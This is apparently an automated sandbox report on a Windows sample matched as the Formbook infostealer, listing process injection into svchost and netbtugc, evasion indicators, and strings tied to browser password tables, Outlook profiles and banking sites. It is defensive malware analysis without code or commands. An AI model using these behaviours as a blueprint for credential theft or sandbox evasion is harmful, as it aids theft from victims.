Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/10
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe File created: C:\Users\user\AppData\Local\Temp\supergroups Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Command line argument: #v 0_2_0040D6B0
Source: jpdy1E8K4A.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003202000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE server_addresses (id VARCHAR, company_name VARCHAR, street_address VARCHAR, address_1 VARCHAR, address_2 VARCHAR, address_3 VARCHAR, address_4 VARCHAR, postal_code VARCHAR, sorting_code VARCHAR, country_code VARCHAR, language_code VARCHAR, recipient_name VARCHAR, phone_number VARCHAR)x;
Source: netbtugc.exe, 00000005.00000003.2649098471.0000000003180000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2649228244.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2651714036.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jpdy1E8K4A.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe File read: C:\Users\user\Desktop\jpdy1E8K4A.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\jpdy1E8K4A.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe" Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: jpdy1E8K4A.exe Static file information: File size 1401503 > 1048576
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: jpdy1E8K4A.exe Static PE information: real checksum: 0xa961f should be: 0x15adcb
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403060 push eax; ret 2_2_00403062
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004160FC push 00000030h; retf 2_2_00416149
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041613C push 00000030h; retf 2_2_00416149
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D211 pushad ; ret 2_2_0040D212
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004132A3 push esi; ret 2_2_004132A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041136F push edi; retf 2_2_00411372
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004135D8 push ds; retf 2_2_004135F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004135E3 push ds; retf 2_2_004135F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414594 push edi; retf 2_2_004145B7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E61E push eax; retf 2_2_0041E647
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004016F6 push ss; ret 2_2_00401859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx 2_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0283D push eax; iretd 2_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A01366 push eax; iretd 2_2_03A01369
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E8404 push esi; ret 3_2_043E8409
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E64D0 push edi; retf 3_2_043E64D3
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E96F5 push edi; retf 3_2_043E9718
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E8739 push ds; retf 3_2_043E8751
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043E8744 push ds; retf 3_2_043E8751
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EC9FC push C5503231h; retf 3_2_043ECA04
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EB25D push 00000030h; retf 3_2_043EB2AA
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Code function: 3_2_043EB29D push 00000030h; retf 3_2_043EB2AA
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe API/Special instruction interceptor: Address: 40D422C
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7096E rdtsc 2_2_03A7096E
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 9731 Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 2.7 %
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560 Thread sleep time: -65000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560 Thread sleep time: -40500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 Thread sleep count: 242 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 Thread sleep time: -484000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 Thread sleep count: 9731 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316 Thread sleep time: -19462000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D5C2C0
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt.microsoft.com/profileVMware20,11696487552u
Source: 01194HH4.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 01194HH4.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rtal.azure.comVMware20,116964875
Source: 01194HH4.5.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 01194HH4.5.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 01194HH4.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 01194HH4.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e365.comVMware20,11696487552t
Source: 01194HH4.5.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: URUrIrqwFu.exe, 00000003.00000002.3983201981.000000000076E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2764226566.000001CFDF1EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 01194HH4.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 01194HH4.5.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 01194HH4.5.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: teractivebrokers.co.inVMware20,11696487552d
Source: 01194HH4.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware
